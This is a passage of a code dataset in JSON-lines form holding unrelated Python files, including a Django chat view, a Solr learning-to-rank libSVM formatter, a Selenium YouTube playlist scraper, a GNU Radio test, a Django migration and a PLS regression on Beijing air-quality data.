If we're looking for a\n # different id, go do actual work.\n cache_key = 'osso.userchat.channel%d' % channel_id\n if cache.get(cache_key) != message_id:\n # Fetch relation_id and group_ids the first time in the\n # loop.\n if relation_id is None:\n if request.user.is_anonymous():\n raise PermissionDenied()\n try:\n relation_id = request.active_relation_id\n except AttributeError:\n try:\n relation_id = request.user.authenticatablecontact.relation_id\n except:\n raise PermissionDenied()\n group_ids = list(request.user.groups\n .values_list('id', flat=True))\n\n # Check the channels for permissions, if there is\n # something fishy, bail out and return the empty dict.\n if Channel.objects.filter(\n id__in=[i[0] for i in pairs],\n relation__id=relation_id,\n groups__in=group_ids).distinct().count() != len(pairs):\n return JsonResponse(request, {}, compact=True)\n\n message_qs = Message.objects.filter(\n id__gt=message_id, channel__id=channel_id)\n if exclude_empty_sender:\n message_qs = message_qs.exclude(sender=None)\n if hasattr(message_qs, 'prefetch_related'):\n message_qs = message_qs.prefetch_related('sender')\n else:\n message_qs = message_qs.select_related('sender')\n messages = list(message_qs.order_by('timestamp'))\n\n # Run it through the message filters.\n final_messages = []\n for message in messages:\n message = pre_send_run(message, channel_id=channel_id,\n group_ids=group_ids)\n if message:\n final_messages.append(message)\n\n if len(final_messages):\n json[channel_id] = messages_to_json(final_messages,\n user=request.user)\n if len(messages):\n # Store the last one we found, even if it was filtered.\n last_id = messages[-1].id\n else:\n # Attempt to set the cache for subsequent requests. But\n # don't go above the message_id we checked, in case\n # there is a new message just now.\n last_id = None\n messages = list(Message.objects.filter(channel__id=channel_id,\n id__lte=message_id)\n .order_by('-id')[0:1])\n if len(messages):\n last_id = messages[0].id\n\n if last_id is not None:\n cache.set(cache_key, last_id, CACHE_TIME)\n\n return JsonResponse(request, json, compact=True)\n","sub_path":"osso/userchat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"199040599","text":"import json\nfrom LTRLibrary import LTRLibrary\n\nPAIRWISE_THRESHOLD = 1.e-1\nFEATURE_DIFF_THRESHOLD = 1.e-6\n\nclass LibraryFormatter(LTRLibrary):\n\n def processQueryDocFeatureVector(self,docClickInfo,trainingFile, min_max=False):\n '''Expects as input a sorted by queries list or generator that provides the context\n for each query in a tuple composed of: (query , docId , relevance , source , featureVector).\n The list of documents that are part of the same query will generate comparisons\n against each other for training. 
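Each emitted line uses the sparse libSVM format, e.g. \"+1 1:0.5 3:-0.2\".\n        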
'''\n with open(trainingFile,\"w\") as output:\n self.featureNameToId = {}\n self.featureIdToName = {}\n self.curFeatIndex = 1;\n curListOfFv = []\n curQueryAndSource = \"\"\n for query,docId,relevance,source,featureVector in docClickInfo:\n if curQueryAndSource != query + source:\n #Time to flush out all the pairs\n _writeRankSVMPairs(curListOfFv,output);\n curListOfFv = []\n curQueryAndSource = query + source\n curListOfFv.append((relevance,self._makeFeaturesMap(featureVector)))\n _writeRankSVMPairs(curListOfFv,output); #This catches the last list of comparisons\n\n def convertLibraryModelToLtrModel(self, libSvmModelLocation, outputFile, modelName, featureStoreName, useMinMax, min_max):\n with open(libSvmModelLocation, 'r') as inFile:\n content = {}\n\n content[\"class\"] = \"org.apache.solr.ltr.model.LinearModel\"\n content[\"store\"] = str(featureStoreName)\n content[\"name\"] = str(modelName)\n content[\"features\"] = []\n\n for featKey in self.featureNameToId.keys():\n if useMinMax:\n min_, max_ = min_max[featKey][\"min\"], min_max[featKey][\"max\"]\n norm = {\"class\": \"org.apache.solr.ltr.norm.MinMaxNormalizer\", \"params\":{ \"min\": min_, \"max\": max_ } }\n content[\"features\"].append({\"name\" : featKey, \"norm\": norm})\n else:\n content[\"features\"].append({\"name\" : featKey})\n\n content[\"params\"] = {\"weights\":{}}\n\n startReading = False\n counter = 1\n for line in inFile:\n if startReading:\n newParamVal = float(line.strip())\n content[\"params\"][\"weights\"][self.featureIdToName[counter]] = float(newParamVal)\n counter += 1\n elif line.strip() == 'w':\n startReading = True\n\n with open(outputFile,'w') as convertedOutFile:\n json.dump(content, convertedOutFile, sort_keys=False, indent=4)\n\ndef _writeRankSVMPairs(listOfFeatures,output):\n '''Given a list of (relevance, {Features Map}) where the list represents\n a set of documents to be compared, this calculates all pairs and\n writes the Feature Vectors in a format compatible with libSVM.\n Ex: listOfFeatures = [\n #(relevance, {feature1:value, featureN:value})\n (4, {1:0.9, 2:0.9, 3:0.1})\n (3, {1:0.7, 2:0.9, 3:0.2})\n (1, {1:0.1, 2:0.9, 6:0.1})\n ]\n '''\n for d1 in range(0,len(listOfFeatures)):\n for d2 in range(d1+1,len(listOfFeatures)):\n doc1,doc2 = listOfFeatures[d1], listOfFeatures[d2]\n fv1,fv2 = doc1[1],doc2[1]\n d1Relevance, d2Relevance = float(doc1[0]),float(doc2[0])\n if d1Relevance - d2Relevance > PAIRWISE_THRESHOLD:#d1Relevance > d2Relevance\n outputLibSvmLine(\"+1\",subtractFvMap(fv1,fv2),output);\n outputLibSvmLine(\"-1\",subtractFvMap(fv2,fv1),output);\n elif d1Relevance - d2Relevance < -PAIRWISE_THRESHOLD: #d1Relevance < d2Relevance:\n outputLibSvmLine(\"+1\",subtractFvMap(fv2,fv1),output);\n outputLibSvmLine(\"-1\",subtractFvMap(fv1,fv2),output);\n else: #Must be approximately equal relevance, in which case this is a useless signal and we should skip\n continue;\n\ndef subtractFvMap(fv1,fv2):\n '''returns the fv from fv1 - fv2'''\n retFv = fv1.copy();\n for featInd in fv2.keys():\n subVal = 0.0;\n if featInd in fv1:\n subVal = fv1[featInd] - fv2[featInd]\n else:\n subVal = -fv2[featInd]\n if abs(subVal) > FEATURE_DIFF_THRESHOLD: #This ensures everything is in sparse format, and removes useless signals\n retFv[featInd] = subVal;\n else:\n retFv.pop(featInd, None)\n return retFv;\n\ndef outputLibSvmLine(sign,fvMap,outputFile):\n outputFile.write(sign)\n for feat in fvMap.keys():\n outputFile.write(\" \" + str(feat) + \":\" + str(fvMap[feat]));\n 
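# terminate this training example's line in the output file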
outputFile.write(\"\\n\")\n","sub_path":"libsvm_formatter.py","file_name":"libsvm_formatter.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"142048432","text":"from __future__ import division, print_function, unicode_literals\r\nimport sys\r\nprint(sys.version)\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n#load data\r\nxls = pd.ExcelFile('D:\\AHocMay\\BTL\\VN.csv')\r\ndata = pd.read_excel(xls, 'Sheet1BC')\r\n\r\n#plot diagram avgmonths of year\r\nTempAvg = data.iloc[0:12, 16:18]\r\nmonth = np.arange(1, 13, 1)#print(12 month)\r\n#print(TempAvg) print(month)\r\nX = month\r\ny = TempAvg\r\nplt.plot(X, y, 'ro')\r\nplt.axis([0, 12, 10, 35])\r\nplt.title('Display Average Temperature of months from 2002-2017')\r\nplt.xlabel('Month ')\r\nplt.ylabel('Temp ( C)')\r\n#plt.show()\r\n\r\n#display 12 diagrams of temp of 12 months\r\ndef PlotTemp_Month (Time, Temperature):\r\n X_year = Time\r\n y_month = Temperature\r\n plt.plot(X_year, y_month, 'ro')\r\n plt.axis([2002, 2017, 5, 35])\r\n plt.title('Display Temperature of month from 2002 to 2017.')\r\n plt.xlabel('Year ')\r\n plt.ylabel('Temp (C)')\r\n plt.show()\r\n#display 12 diagrams continuos\r\nfor i in range(2, 13):\r\n Timee = data.iloc[13*i:(13*i+15), 15:16]\r\n Temp_Feb = data.iloc[13*i:(13*i+15), 1:2]\r\n PlotTemp_Month(Timee, Temp_Feb)\r\n \r\n","sub_path":"Weather_Display.py","file_name":"Weather_Display.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365501862","text":"# -*- encoding=utf-8 -*-\r\n\r\nimport re\r\nimport os\r\nimport codecs\r\nimport xlwt\r\n\r\n# Global Params Start.\r\nFILE_SUFFIX = '.cs'\r\n# PUMP_RE = '.*?PostAPI.*?webApi.*?' #SFDC_API_Post\r\nPUMP_RE = '\"/SFDC.*?\"' #SFDC_API\r\n#PUMP_RE = '.*?GetAPI.*?webApi.*?' 
#SFDC_API_Get\r\nROOT_PATH = 'C:\\\\Users\\\\da.long\\\\source\\\\Workspaces\\\\OCE Wechat Demo'\r\nEXCEL_FILE_NAME = u'SFDC_API_bak.xls'\r\nRESULT = xlwt.Workbook(encoding='utf-8', style_compression=0)\r\nsheet = RESULT.add_sheet('SFDC_API', cell_overwrite_ok=True)\r\nsheet.write(0, 0, 'API')\r\nsheet.write(0, 1, 'cs_file')\r\nsheet.write(0, 2, 'line')\r\nn = 1\r\n# Global Params End.\r\n\r\n\r\n# Get a specified suffix file list from ROOT_PATH.\r\ndef get_all_files(root_path):\r\n    name_list = []\r\n    for root, dirs, files in os.walk(root_path):  # walk every directory, including the root itself\r\n        for file in files:  # iterate over files and grab those with the target suffix\r\n            pre, suf = os.path.splitext(file)\r\n            if suf == FILE_SUFFIX:\r\n                name_list.append(os.path.join(root, file))\r\n    print(name_list.__len__())\r\n    return name_list\r\n\r\n\r\n# Regular expression match.\r\ndef find_re(line, line_num, file_name):\r\n    line_list = []\r\n\r\n    pattern = re.compile(PUMP_RE, re.S)\r\n    api_list = re.findall(pattern, line)\r\n    for item in api_list:\r\n        if item is not None:\r\n            line_list.append({\r\n                'api_name': item[2:].split('\"')[0],\r\n                'file_name': file_name,\r\n                'line': line_num\r\n            })\r\n    if line_list.__len__() > 0:\r\n        # print(line_list)\r\n        return line_list\r\n    else:\r\n        return\r\n\r\n\r\n# Read a file, find if there is matched pattern in file, and return the result.\r\ndef pump_file(file):\r\n    ret_list = []\r\n\r\n    file_obj = codecs.open(file, 'r', 'utf-8')\r\n    i = 1\r\n    while True:\r\n        line = file_obj.readline()  # read a single line\r\n        if not line:  # stop when nothing more is read\r\n            break\r\n        line_match_list = find_re(line, i, file)\r\n        i += 1\r\n        if line_match_list is not None:\r\n            ret_list.extend(line_match_list)\r\n    # print(ret_list)\r\n    file_obj.close()\r\n\r\n    return ret_list\r\n\r\n\r\n# If a file's content matches PUMP_RE, then save the result into excel.\r\ndef save_to_excel(ret_list):\r\n    for item in ret_list:\r\n        api_name = item['api_name']\r\n        file_name = item['file_name']\r\n        line = item['line']\r\n\r\n        global n\r\n        sheet.write(n, 0, api_name)\r\n        sheet.write(n, 1, file_name)\r\n        sheet.write(n, 2, line)\r\n        n = n + 1\r\n\r\n\r\ndef test():\r\n    pump_file('C:\\\\Users\\\\da.long\\\\source\\\\Workspaces\\\\MFP_Merck\\\\test.cs')\r\n\r\n\r\ndef main():\r\n    file_list = get_all_files(ROOT_PATH)\r\n    # test()\r\n    for file in file_list:\r\n        ret_list = pump_file(file)\r\n        if ret_list is not None:\r\n            save_to_excel(ret_list)\r\n    return\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n\r\nRESULT.save(EXCEL_FILE_NAME)\r\n\r\n\r\n","sub_path":"PumpData/bak_test.py","file_name":"bak_test.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273663477","text":"\"\"\"\n@difficulty: medium\n@tags: misc\n@notes: Basic statistic calculations. 
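One pass over the count histogram yields min/max/mean/mode; a second partial pass locates the median.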
\n\"\"\"\nclass Solution(object):\n def sampleStats(self, count):\n \"\"\"\n :type count: List[int]\n :rtype: List[float]\n \"\"\"\n minimum, maximum, mean, median, mode = [255, 0, 0, 0, 0]\n _count, _modeCount = 0, 0\n for i, val in enumerate(count):\n if val > 0 and i < minimum:\n minimum = i\n if val > 0 and i > maximum:\n maximum = i\n if val > _modeCount:\n mode = i\n _modeCount = val\n if val > 0:\n mean = float(mean * _count + val * i) / (_count + val)\n _count += val\n _medianCount = _count / 2.0\n _tempCount = 0\n for i in range(0, len(count) - 1):\n _tempCount += count[i]\n if _tempCount == _medianCount:\n median = (i + i + 1) / 2.0\n break\n if _tempCount < _medianCount and _tempCount + count[i+1] > _medianCount:\n median = i + 1\n break\n return map(float, [minimum, maximum, mean, median, mode])\n","sub_path":"solution/python/1093.py","file_name":"1093.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526423357","text":"import time, random, csv, re, requests\nfrom scrapy.selector import Selector\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\n\nclass ChannelFinder():\n\n def __init__(self):\n chrome_options = Options()\n #chrome_options.add_argument(\"--headless\")\n #chrome_options.add_argument('--proxy-server=%s' % '192.161.166.122:3128')\n chrome_options.add_argument(\"--window-size=1920x1080\")\n\n path_to_chromedriver = 'chromedriver'\n self.driver = webdriver.Chrome(chrome_options=chrome_options, executable_path=path_to_chromedriver)\n\n def crawl(self, depth, keyword):\n\n playlists = []\n keyword = keyword.strip()\n print(\"keyword [{}]\".format(keyword))\n driver = self.driver\n driver.get('https://www.youtube.com/results?search_query={}'.format(keyword))\n\n # Searching for only playlists\n filter_btn = driver.find_elements_by_xpath(\".//paper-button[contains(@aria-label, 'Search filters')]\")[0]\n filter_btn.click()\n time.sleep(1)\n playlist_btn = driver.find_elements_by_xpath(\".//div[contains(@title, 'Search for Playlist')]\")[0]\n playlist_btn = playlist_btn.find_element_by_xpath('..')\n playlist_btn.click()\n time.sleep(1)\n\n for i in range(depth):\n print(i)\n html = driver.find_element_by_tag_name('html')\n html.send_keys(Keys.PAGE_DOWN)\n html.send_keys(Keys.PAGE_DOWN)\n time.sleep(random.uniform(0.05, 0.1))\n\n response = Selector(text=str(driver.page_source))\n for r in response.xpath(\"//*[contains(@class, 'ytd-item-section-renderer')]\"):\n try:\n playlist_url = 'https://www.youtube.com'+r.xpath(\".//a[contains(@href, '/watch?v=')]/@href\").extract_first()\n print(playlist_url)\n\n if playlist_url not in playlists:\n playlists.append(playlist_url)\n except:\n print('gay')\n driver.quit()\n\n # getting all videos from playlists\n videos = []\n\n ind = 0\n for playlist in playlists:\n ind += 1\n print(ind,len(playlists))\n r = requests.get(url=playlist)\n videos += re.findall('/watch\\?v=+[a-zA-Z0-9-_.]{11}', r.content.decode('utf-8'))\n\n text_file = open(\"videos.txt\", \"w\")\n for video in videos:\n text_file.write(video+'\\n')\n text_file.close()\n\n return videos\n","sub_path":"newyt/ChannelFinder.py","file_name":"ChannelFinder.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490553865","text":"#!/usr/bin/env python\n# \n# Copyright 2014 <+YOU OR YOUR COMPANY+>.\n# 
\n# This is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3, or (at your option)\n# any later version.\n# \n# This software is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this software; see the file COPYING. If not, write to\n# the Free Software Foundation, Inc., 51 Franklin Street,\n# Boston, MA 02110-1301, USA.\n# \n\nfrom gnuradio import gr, gr_unittest\nimport power_swig as power\n\nclass qa_power (gr_unittest.TestCase):\n\n def setUp (self):\n self.tb = gr.top_block ()\n\n def tearDown (self):\n self.tb = None\n\n def test_001_power (self):\n # set up fg\n src_data0 = (2,1,4,3,-5)\n src_data1 = (1,2,3,2,3)\n expected_result = (2,1,64,9,-75)\n src0 = blocks.vector_source_f(src_data0)\n src1 = blocks.vector_source_f(src_data1)\n pwr = power.power()\n dst = blocks.vector_sink_f()\n self.tb.connect(src0,sqr)\n self.tb.connect(src1,sqr)\n self.tb.connect(sqr,dst)\n self.tb.run ()\n result_data = dst.data()\n self.assertFloatTuplesAlmostEqual(expected_result,result_data,5)\n \n # check data\n\n\nif __name__ == '__main__':\n gr_unittest.run(qa_power, \"qa_power.xml\")\n","sub_path":"gr-power/python/qa_power.py","file_name":"qa_power.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"231515928","text":"#!/usr/bin/env python\n#coding=utf-8\n'''\nCreated on 2012-6-16\n\n@author: Chine\n'''\n\nimport time\nimport mimetypes\nimport hmac\nfrom hashlib import sha256\n\nfrom errors import ChiliError\n\ndef hmac_sha256_hex(secret, data):\n return hmac.new(secret, data, sha256).hexdigest()\n\nclass FormUploadFile(object):\n def __init__(self, f, fname):\n self.fname = fname\n self.f = f\n\ndef encode_multipart(kwargs):\n '''\n Build a multipart/form-data body with generated random boundary.\n '''\n boundary = '----------%s' % hex(int(time.time() * 1000))\n data = []\n \n for k, v in kwargs.iteritems():\n data.append('--%s' % boundary)\n if isinstance(v, FormUploadFile):\n if hasattr(v.f, 'read'):\n content = v.f.read()\n else:\n content = v.f\n \n file_type = mimetypes.guess_type(v.fname)\n if file_type is None:\n raise ChiliError('utils', -1, 'Could not determine file type')\n file_type = file_type[0]\n \n data.append('Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' % (k, v.fname))\n data.append('Content-Length: %d' % len(content))\n data.append('Content-Type: %s\\r\\n' % file_type)\n data.append(content)\n else:\n data.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % k)\n data.append(v.encode('utf-8') if isinstance(v, unicode) else str(v))\n \n data.append('--%s--\\r\\n' % boundary)\n return '\\r\\n'.join(data), boundary","sub_path":"Chili/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"301796406","text":"from srg import srg\nfrom srg.srg import Question, Answer, SRG, array\nfrom srg import solver\nfrom srg import database as db\nfrom srg import sorter\nimport numpy as np\nimport pytest\n\nproblems_all = []\n\nproblems = db.list_problems()\nfor p in problems:\n 
\n    v,k,l,u = db.extract_vklu(p)\n    if v < 20:\n        solutions = db.get_solutions(v,k,l,u)\n        problems_all.append((v,k,l,u, solutions))\n\n\n@pytest.mark.parametrize('v,k,l,u, database', problems_all)\ndef test_solve(v: int, k: int, l: int, u: int, database):\n    srg = SRG(solver._seed(v,k,l,u))\n    actuals = solver.solve(srg)\n    actuals_sorted = sorter.sort(actuals)\n\n    for actual, expected in zip(actuals_sorted, database):\n        assert np.array_equal(actual, expected)\n\n\n@pytest.mark.parametrize('v,k,l,u, database', problems_all)\ndef test_solve_question(v: int, k: int, l: int, u: int, database):\n    expected_rows = [exp[2, 3:] for exp in database]\n    \n    s = solver._seed(v, k, l, u)\n    q = Question.from_matrix(s)    \n    actuals = list(solver.solve_question(q))  # actuals are only candidates of real solutions.\n    \n    for actual in actuals:\n        match = map(lambda exp: np.array_equal(exp, actual), expected_rows)\n        if any(match): return\n    \n    assert False, f'actuals {actuals} does not match any in expected {expected_rows}'\n    \ndef test2():\n    A = srg.array([[0, 1],\n                   [0, 1],\n                   [0, 0],\n                   [1, 0],\n                   [1, 0],\n                   [0, 0]])\n    b = srg.array([4, 4, 0, 4, 4, 0])\n\n    bound = srg.array([4, 4])\n    ans = Answer(value=srg.array([0, -1, 0, 0, -1]), location=srg.array([0, 4, 8, 12, 16]), len=20)\n    Q = Question(A, b, 8, bound, ans)\n\n    solver.only_1_element_in_row(Q)\n    Q._invariant_check()\n\n","sub_path":"tests/test_solver.py","file_name":"test_solver.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"318507481","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('auth', '0006_require_contenttypes_0002'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='MyUser',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('password', models.CharField(max_length=128, verbose_name='password')),\n                ('last_login', models.DateTimeField(null=True, verbose_name='last login', blank=True)),\n                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),\n                ('avatar', models.ImageField(upload_to=b'user', verbose_name='Profile image', blank=True)),\n                ('username', models.CharField(error_messages={b'unique': 'A user with that username already exists.'}, max_length=30, validators=[django.core.validators.RegexValidator(b'^[\\\\s\\\\w.@+-]+$', 'Enter a valid username. This value may contain only letters, numbers and @/./+/-/_ characters.', b'invalid')], help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', unique=True, verbose_name='username')),\n                ('first_name', models.CharField(max_length=30, verbose_name='first name', blank=True)),\n                ('last_name', models.CharField(max_length=30, verbose_name='last name', blank=True)),\n                ('email', models.EmailField(max_length=254, verbose_name='email address', blank=True)),\n                ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),\n                ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. 
Unselect this instead of deleting accounts.', verbose_name='active')),\n                ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),\n                ('groups', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Group', blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', verbose_name='groups')),\n                ('user_permissions', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Permission', blank=True, help_text='Specific permissions for this user.', verbose_name='user permissions')),\n            ],\n        ),\n        migrations.CreateModel(\n            name='Competition',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('name', models.CharField(max_length=1000, verbose_name='Name of Competition')),\n                ('image', models.ImageField(upload_to=b'competition', verbose_name='Photo of Competition')),\n            ],\n        ),\n        migrations.CreateModel(\n            name='Photo',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('create_date', models.DateTimeField(auto_now=True)),\n                ('small_image', models.ImageField(upload_to=b'photo/small', verbose_name='Small photo')),\n                ('image', models.ImageField(upload_to=b'photo', verbose_name='Photo')),\n                ('author', models.ForeignKey(verbose_name='author', to=settings.AUTH_USER_MODEL)),\n                ('competition', models.ForeignKey(verbose_name='Competition', to='main.Competition')),\n            ],\n        ),\n    ]\n","sub_path":"main/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451770758","text":"from pyravendb.store.document_store import DocumentStore\nfrom pyravendb.connection.requests_executor import RequestsExecutor  # assumed import path for RequestsExecutor\n\n\nclass OpeningSession(object):\n    @staticmethod\n    def open_session():\n        store = DocumentStore()\n        store.initialize()\n\n        # region open_session_1\n        # Open session for a 'default' database configured in 'documentstore'\n        with store.open_session() as session:\n            session.load(\"doc/1\")\n            # code here\n\n        # Open session for a specific database\n        with store.open_session(database=\"Your database\") as session:\n            session.load(\"doc/2\")\n            # code here\n\n        # Open session with request_executor\n        request_executor = RequestsExecutor(database_name=\"Your database\", certificate=None)\n        with store.open_session(request_executor=request_executor) as session:  # open_session is an instance method\n            session.load(\"doc/3\")\n            # code here\n\n        # endregion\n","sub_path":"Documentation/4.0/Samples/python/clientapi/session/OpeningSession.py","file_name":"OpeningSession.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418343746","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom sklearn.cross_decomposition import PLSRegression \r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.pylab as plt\r\nimport xlrd\r\nimport xlwt\r\nimport random\r\n\r\n###############################\r\n# new X and Y\r\n\r\n# read the AQI (Y) data from Excel\r\nfile = r\"aqi-beijing.xlsx\"\r\nbook = xlrd.open_workbook(file)\r\nsheet0 = book.sheet_by_index(0)\r\ny = []\r\nstart = 1\r\nend = 1000\r\nweather = []\r\nfor i in range(start, end):\r\n    # adjust the AQI range\r\n    y.append(float(sheet0.cell_value(i, 10)))\r\n    try:\r\n        weather.append(float(sheet0.cell_value(i, 5)))\r\n    except:\r\n        weather.append(0)\r\ny = np.array(y).reshape(int(len(y)), 
1)\r\nweather = np.array(weather).reshape(int(len(weather)/1), 1)\r\n\r\n# pick the ground truth over a continuous time span\r\ncontinuous_start = 230\r\ncontinuous_end = 290\r\nY_Treal = y[continuous_start:continuous_end]\r\nY_Treal = np.array(Y_Treal).reshape(len(Y_Treal), 1)\r\n\r\n\r\n# read all weather factor (X) data from Excel\r\nfile = r\"weather-beijing.xls\"\r\nbook = xlrd.open_workbook(file)\r\nsheet0 = book.sheet_by_index(0)\r\nx = []\r\nfor i in range(start, end):\r\n    for m in range(1, 8):\r\n        day_value = 0\r\n        sumall = 0\r\n        count = 0\r\n        for j in range(1,9):\r\n            while sheet0.cell_value(j + 8 * i, m) == '':\r\n                j = j + 1\r\n            try:\r\n                sumall = sumall + float(sheet0.cell_value(j+8*i, m))\r\n            except:\r\n                sumall = 0\r\n            count = count + 1\r\n        day_value = float(sumall/count)\r\n        x.append(day_value)\r\nx = np.array(x).reshape(int(len(x)/7), 7)\r\nx = np.concatenate((x, weather), axis = 1)\r\n\r\n\r\n##########################\r\n# choose the dataset splits and ranges\r\nnumber_train = int(0.65*len(y))\r\nnumber_test = int(0.95*len(y))\r\n\r\nx_train = x[0:number_train,:]\r\nx_test = x[number_train+1:number_test,:]\r\nx_valid = x[number_test+1:int(len(y)) + 1,:]\r\n\r\ny_train = y[0:number_train,:]\r\ny_test = y[number_train+1:number_test,:]\r\ny_valid = y[number_test+1:int(len(y)) + 1,:]\r\n\r\n# select the continuous prediction input set\r\nx = x.reshape(-1)\r\nx = x.tolist()\r\nx_T = x[8*continuous_start:8*continuous_end]\r\nx_T = np.array(x_T).reshape(int(len(x_T)/8), 8)\r\n\r\n##################\r\n# filter the test set down to AQI values within a given range\r\nAQI_min = 100\r\nAQI_max = 200\r\nstep = 0\r\ny_test = y_test.reshape(-1)\r\ny_test = y_test.tolist()\r\nx_test = x_test.reshape(-1)\r\nx_test = x_test.tolist()\r\nwhile step != len(y_test):\r\n    if y_test[step] not in range(AQI_min, AQI_max):\r\n        y_test.remove(y_test[step])\r\n        del(x_test[8 * step : 8 * step + 8])\r\n    else:\r\n        step += 1\r\nx_test = np.array(x_test).reshape(int(len(x_test)/8),8)\r\ny_test = np.array(y_test).reshape(int(len(y_test)), 1)\r\n\r\n\r\n# shuffle the order\r\n'''\r\nshuffle = np.hstack((y, x))\r\nnp.random.shuffle(shuffle)\r\ny = np.array([shuffle[i][0] for i in range(shuffle.shape[0])])\r\ny = np.array(y).reshape(int(len(y)), 1)\r\nx = np.array([shuffle[i][1:] for i in range(shuffle.shape[0])])\r\n#x = np.array(x).reshape(int(len(x)/7),7)\r\n'''\r\n\r\n\r\n######################################\r\n# choose the number of latent variables; S is not used here, R^2 and RMSE are\r\nrr2 = [] \r\nerror = []\r\n# the number of latent variables needs tuning\r\nfor i in range(1, 8):\r\n    pls2 = PLSRegression( n_components = i )\r\n    pls2.fit(x_train, y_train)\r\n    Y_pred = pls2.predict(x_valid)\r\n    m, n=x_valid.shape\r\n    meany=np.mean(y_valid, 0)\r\n    rmse = ((sum((Y_pred - y_valid) ** 2)/(m - 2))) ** 0.5/100\r\n    tss = sum((meany - y_valid) ** 2)\r\n    rss = sum((Y_pred - y_valid) ** 2)\r\n    r2 = 1 - rss / tss\r\n    error.append(rmse)\r\n    rr2.append(r2)\r\nerror = np.array(error)\r\nrr2 = np.array(rr2)\r\n#print(error)\r\n#print(rr2)\r\n\r\n\r\n##################\r\n# plot RMSE and R^2 (the evaluation metrics)\r\n# choose the best n_components\r\n'''\r\nplt.figure('error analysis')\r\nplt.ylabel('Average error rate S')\r\nplt.xlabel('The number of latent variables')\r\nx_label = range(1, 8)\r\nplt.plot(x_label, error, \"x-\", label = \"RMSE\")\r\nplt.ylim(0.2, 0.5)\r\nplt.legend()\r\nplt.show()\r\n'''\r\n\r\n###################\r\n# plot the final result\r\n# use the model with 4 latent variables, tuned by cross validation\r\npls2 = PLSRegression(n_components = 4)\r\npls2.fit(x_train, y_train)\r\nY_pred = pls2.predict(x_test)\r\nY_Tpred = pls2.predict(x_T)\r\n\r\n\r\n####################\r\n# compute the prediction error\r\nS = (sum((y_test - Y_pred)**2) / len(Y_pred))**0.5 / np.mean(y_test)\r\nprint(\"S: %f\" %S[0])\r\n\r\nfig = plt.figure()\r\n\r\nplt.plot(Y_pred, marker='x', 
